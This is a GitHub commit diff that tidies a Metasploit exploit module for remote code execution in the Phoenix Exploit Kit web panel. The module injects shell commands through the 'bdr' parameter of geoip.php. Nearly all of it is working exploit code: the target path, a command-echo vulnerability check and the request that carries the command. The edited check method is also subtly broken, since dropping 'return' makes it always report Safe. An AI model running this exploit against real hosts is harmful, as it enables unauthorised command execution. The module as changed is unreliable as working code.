Skip to content

Commit 53516d3

Browse files
committed
Fix rapid7#7220, phoenix_exec module cleanup
1 parent ea32c31 commit 53516d3

File tree

1 file changed

+13
-13
lines changed

1 file changed

+13
-13
lines changed

modules/exploits/multi/http/phoenix_exec.rb

Lines changed: 13 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -14,22 +14,22 @@ def initialize(info={})
1414
super(update_info(info,
1515
'Name' => 'Phoenix Exploit Kit Remote Code Execution',
1616
'Description' => %q{
17-
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
17+
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The
1818
Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
19-
presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
20-
then silently installs malware.
19+
presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,
20+
silently installing malware if found.
2121
},
2222
'License' => MSF_LICENSE,
2323
'Author' =>
2424
[
25-
'CrashBandicot @DosPerl', #initial discovery
25+
'CrashBandicot', #initial discovery by @DosPerl
2626
'Jay Turla <@shipcod3>', #msf module
2727
],
2828
'References' =>
2929
[
3030
[ 'EDB', '40047' ],
3131
[ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
32-
[ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
32+
[ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
3333
],
3434
'Privileged' => false,
3535
'Payload' =>
@@ -45,25 +45,25 @@ def initialize(info={})
4545
'Arch' => ARCH_CMD,
4646
'Targets' =>
4747
[
48-
['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
49-
['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
48+
[ 'Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
49+
[ 'Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
5050
],
5151
'DisclosureDate' => 'Jul 01 2016',
5252
'DefaultTarget' => 0))
5353

5454
register_options(
5555
[
56-
OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
57-
],self.class)
56+
OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])
57+
], self.class)
5858
end
5959

6060
def check
6161
test = Rex::Text.rand_text_alpha(8)
6262
res = http_send_command("echo #{test};")
6363
if res && res.body.include?(test)
64-
return Exploit::CheckCode::Vulnerable
64+
Exploit::CheckCode::Vulnerable
6565
end
66-
return Exploit::CheckCode::Safe
66+
Exploit::CheckCode::Safe
6767
end
6868

6969
def exploit
@@ -72,12 +72,12 @@ def exploit
7272
end
7373

7474
def http_send_command(cmd)
75-
send_request_cgi({
75+
send_request_cgi(
7676
'method' => 'GET',
7777
'uri' => normalize_uri(target_uri.path),
7878
'vars_get' => {
7979
'bdr' => cmd
8080
}
81-
})
81+
)
8282
end
8383
end

0 commit comments

Comments
 (0)